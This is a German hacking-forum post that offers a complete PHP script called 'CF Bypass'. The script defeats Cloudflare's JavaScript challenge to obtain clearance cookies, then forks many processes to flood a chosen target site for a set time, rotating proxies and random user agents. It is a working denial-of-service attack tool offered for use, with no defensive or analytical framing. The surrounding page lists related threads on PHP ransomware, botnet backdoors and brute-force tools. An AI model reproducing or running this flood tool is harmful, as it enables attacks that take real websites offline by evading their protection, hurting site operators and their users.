PHP Cloudflare Bypass 2017

<?php
    /**
     * CF Bypass
     *
     * @
	authorccv
 sizzuz
     * @copyright Copyright &copy; sizzuz
     *
     */

    //ini_set('display_errors', 1);
    //error_reporting(E_ALL);
    
    function do_curl($url, $useragent = '', $proxy = '', $header = false, $nobody = false, $followlocation = false, $cookie = '', $timeout = 30)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, !!$followlocation);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_ENCODING, '');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        if ($header) curl_setopt($ch, CURLOPT_HEADER, true);
        if ($nobody) curl_setopt($ch, CURLOPT_NOBODY, true);
        if (strlen($useragent) > 0) curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        if (strlen($proxy) > 0) curl_setopt($ch, CURLOPT_PROXY, $proxy);
        if (strlen($cookie) > 0) curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        $result = curl_exec($ch);
        curl_close($ch);
        
        return $result;
    }
    
    function get_useragent()
    {
        //get random user agent
        $uas = array(    'Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
                        'Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
                        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36',
                        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36',
                        'Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54',
                        'Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
                        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36');
        return $uas[array_rand($uas)];
    }
    
    function get_proxy($filename, $line_length = 4096)
    {
        //get random line from file
        $random_line = '';
        if (file_exists($filename) && is_readable($filename))
        {
            //based on: http://stackoverflow.com/questions/12118995/how-to-echo-random-line-from-text-file
            $handle = fopen($filename, 'r');
            if ($handle)
            {
                $line = null;
                $count = 0;
                while (($line = fgets($handle, $line_length)) !== false)
                {
                    $count++;
                    if ((mt_rand() % $count) == 0)
                        $random_line = $line;
                }
                if (!feof($handle))    //unexpected fgets() fail
                    $random_line = '';
                fclose($handle);
            }
        }
        
        return trim($random_line);
    }
    
    function cfbypass($url, $useragent = '', $proxy = '')
    {
        $ret = array(    'success' => false,
                        'msg' => '',
                        'cookie' => array());
        
        $cookie = array();
        
        //get domain and scheme
        $url_parsed = parse_url($url);
        if (!is_array($url_parsed) || !isset($url_parsed['host']))
        {
            $ret['msg'] = 'cant determine domain';
            return $ret;
        }
        $url_domain = $url_parsed['host'];
        $url_scheme = (isset($url_parsed['scheme']) ? $url_parsed['scheme'] : 'http');
        
        //there is an issue with this method. if there is a '+' in the pass parameter, cloudflare does not give clearance (also tested with browser, it is a cloudflare issue)
        //so we have to take care to get a pass without a '+'
        $lc = 0;
        $get = true;
        do
        {
            //get head
            $cfuam = do_curl($url, $useragent, $proxy, true, true);
            
            //check, if this looks like CF UAM
            if (strpos($cfuam, 'cloudflare-nginx') === false || strpos($cfuam, 'chk_jschl') === false)
            {
                $ret['msg'] = 'no CF UAM';
                break;
            }
            
            //get CF cookie
            if (!preg_match('/^Set\-Cookie\: __cfduid\=([a-z0-9]+);/m', $cfuam, $matches_cfuid))
            {
                $ret['msg'] = 'cant find cookie __cfduid';
                break;
            }
            $cookie['__cfduid'] = '__cfduid='.$matches_cfuid[1];
            
            //get refresh URL
            if (!preg_match('/^Refresh\: (\d);URL\=(.+)$/m', $cfuam, $matches_refresh_url))
            {
                $ret['msg'] = 'cant find refresh url';
                break;
            }
            $refresh_url = $url_scheme.'://'.$url_domain.trim($matches_refresh_url[2]);
            //keep the check simple
            if (strpos($refresh_url, '+') === false)
                $get = false;
            
            $lc++;
            if ($lc > 10)
            {
                $ret['msg'] = 'lc hit limit';
                break;
            }
        } while ($get);
        if ($get)
            return $ret;
        
        //properly encode query string
        if (false !== $q = strpos($refresh_url, '?'))
        {
            $a = substr($refresh_url, 0, $q);
            $b = substr($refresh_url, ($q+1));
            parse_str($b, $b);
            $refresh_url = $a.'?'.http_build_query($b);
        }
        
        //wait
        usleep((($matches_refresh_url[1] * 1000000) + 100000));
        
        //try to get clearance
        $cfchk = do_curl($refresh_url, $useragent, $proxy, true, true, false, implode('; ', $cookie));
        if (!preg_match('/^Set\-Cookie\: cf_clearance\=(.+);/Um', $cfchk, $matches_cf_clearance))
        {
            $ret['msg'] = 'did not get clearance';
            return $ret;
        }
        $cookie['cf_clearance'] = 'cf_clearance='.$matches_cf_clearance[1];
        
        //return
        $ret = array(    'success' => true,
                        'msg' => 'successfully bypassed',
                        'cookie' => $cookie);
        return $ret;
    }
    
    echo PHP_EOL;
    echo 'CF Bypass by sizzuz'.PHP_EOL;
    echo 'Usage: <target hostname> <proxy file/nofile> <threads> <time>'.PHP_EOL;
    if (count($argv) < 5)
    {
        echo 'Error: Invalid parameters'.PHP_EOL;
        exit();
    }
    
    echo PHP_EOL;
    echo 'Starting flood on '.$argv[1].' for '.$argv[4].' seconds with '.$argv[3].' threads via proxies from file '.$argv[2].PHP_EOL;
    echo PHP_EOL;
    
    $cfbypass_debug = false;
    $url = $argv[1];
    $proxyfile = $argv[2];
    $threads = $argv[3];
    $expires = (time() + $argv[4]);
    
    for ($i = 1; $i <= $threads; $i++)
    {
        $pid = pcntl_fork();
        if ($pid == -1)
            echo 'Warning: Failed to fork thread '.$i.PHP_EOL;
        else if ($pid)
            continue;//pcntl_wait($status);
        else
        {
            echo 'OK: Started thread '.$i.'. Trying cf bypass...'.PHP_EOL;
            $useragent = get_useragent();
            $proxy = ($proxyfile == 'nofile' ? '' : get_proxy($proxyfile));
            if ($proxy == '' && $proxyfile != 'nofile')
                echo 'Warning: No proxy is set on thread '.$i.PHP_EOL;
                
            $cfbypass = cfbypass($url, $useragent, $proxy);
            if ($cfbypass_debug)
                print_r($cfbypass);
            if ($cfbypass['success'] === true)
            {
                echo 'OK: Thread '.$i.' CF bypassed. Starting flood...'.PHP_EOL;
                while ($expires >= time())
                {
                    //randomize user agent
                    $useragent = get_useragent();
                    $flood = do_curl($url, $useragent, $proxy, false, false, true, implode('; ', $cfbypass['cookie']), 15);
                }
            }
            else
            {
                echo 'Error: Thread '.$i.' CF not bypassed ('.$cfbypass['msg'].')'.PHP_EOL;
            }
            echo 'OK: Closing thread '.$i.PHP_EOL;
            exit();
        }
    }
?>

Thema	Forum	Themenstarter	Statistik	Letzter Beitrag
Suche PHP Backdoor - Botnet	Suchanfragen	Zero00m	2 Antworten 8725 Aufrufe	27 December 2023 - 19:26 Uhr Von: optic1337
[TUT] Bypass Mega.nz 50GB Import Limit	Tutorials	PaulaAbdul	0 Antworten 2441 Aufrufe	08 May 2023 - 23:47 Uhr Von: PaulaAbdul
GiGa PHP BOT	Bots	Sandoz	0 Antworten 4468 Aufrufe	07 October 2021 - 09:55 Uhr Von: Sandoz

PHP Coding → Web Coding → PHP → [F] WP Doorways Erstellt von lisek, 03.02.2020	0 Antworten 4092 Aufrufe	lisek 03.02.2020
Betriebssysteme → Linux Apps → Conky Screenlet - Echtzeit Bitcoin Kurs Coinbase (EUR/USD) Erstellt von TARm0d, 03.12.2017 bitcoin, kurs, conky, screenlet und 6 weitere...	3 Antworten 6438 Aufrufe	TARm0d 12.12.2017
PHP Coding → Web Coding → PHP → PHP Ransomware Erstellt von Zerobyte, 02.10.2017	0 Antworten 5087 Aufrufe	Zerobyte 02.10.2017
Tool Area → Favoured Tools → Allgemein → Brute Force Tool Generator v1.0 Erstellt von PaulaAbdul, 26.08.2014 Bruteforce, PHP, Generator und 2 weitere...	0 Antworten 7816 Aufrufe	PaulaAbdul 26.08.2014
PHP Coding → Web Coding → PHP → Safe-Mail Generator Erstellt von PaulaAbdul, 26.01.2013	2 Antworten 4015 Aufrufe	~~Anne Frank~~ 22.07.2013

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!

#1
PaulaAbdul

Geschrieben 26 September 2017 - 11:01 Uhr

Suche PHP Backdoor - Botnet

[TUT] Bypass Mega.nz 50GB Import Limit

GiGa PHP BOT

Auch mit einem oder mehreren dieser Stichwörter versehen: PHP

[F] WP Doorways

Conky Screenlet - Echtzeit Bitcoin Kurs Coinbase (EUR/USD)

PHP Ransomware

Brute Force Tool Generator v1.0

Safe-Mail Generator

Besucher die dieses Thema lesen:

This topic has been visited by 56 user(s)

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!

PHP Cloudflare Bypass 2017

#1 PaulaAbdul Geschrieben 26 September 2017 - 11:01 Uhr

Auch mit einem oder mehreren dieser Stichwörter versehen: PHP

Besucher die dieses Thema lesen:

This topic has been visited by 56 user(s)

Anmelden

#1
PaulaAbdul

Geschrieben 26 September 2017 - 11:01 Uhr